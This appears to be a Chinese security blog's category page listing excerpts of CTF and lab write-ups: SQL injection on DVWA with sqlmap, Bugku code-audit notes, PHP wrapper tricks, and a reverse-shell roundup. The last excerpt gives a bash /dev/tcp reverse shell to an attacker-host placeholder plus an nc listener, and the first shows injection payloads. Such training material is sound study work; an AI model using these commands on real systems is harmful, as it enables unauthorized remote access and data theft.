Web渗透
秋叶依剑
岁月静好,一直到老。
展开
-
DVWA SQL注入练习(low级别)
文章目录0x01. 基于布尔检测0x02. 使用sqlmap小总结1. 检测注入2. 获取数据库基本信息 0x01. 基于布尔检测 1' and '1'='1 1’ and ‘1’=’2 由此可以判断存在SQL注入 0x02. 使用sqlmap 通过sqlmap 也可以检测注入点 sqlmap -u "http://xiaoxiao.com/vulnerabilities/sqli/?i...原创 2019-12-02 00:14:50 · 324 阅读 · 0 评论 -
Bugku代码审计
文章目录Bugku代码审计0x01. extrack 变量覆盖trim()函数payload0x02. strcmp比较字符串strcmp()函数0x03. urldecode二次编码绕过eregi()函数payload0x04. md5()函数payload0x05. 数组返回NULL绕过payload Bugku代码审计 0x01. extrack 变量覆盖 <?php $flag='x...原创 2019-11-25 02:00:11 · 387 阅读 · 0 评论 -
CTF 中PHP为协议总结
CTF 中PHP为协议总结 php://filter php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。 php://filter 目标使用以下的参数作为它路径的一部分。 复合过...原创 2019-11-09 23:17:01 · 1412 阅读 · 0 评论 -
几种常见反弹shell汇总
0x01. bash 在攻击主机上执行端口监听: nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用 在目标主机上执行: bash -i >& /dev/tcp/攻击主机ip/port 0>&1 //port 为攻击主机端口号 解释: bash -i 打开一个交互的bash >& 将标准...原创 2019-11-10 01:19:00 · 14715 阅读 · 1 评论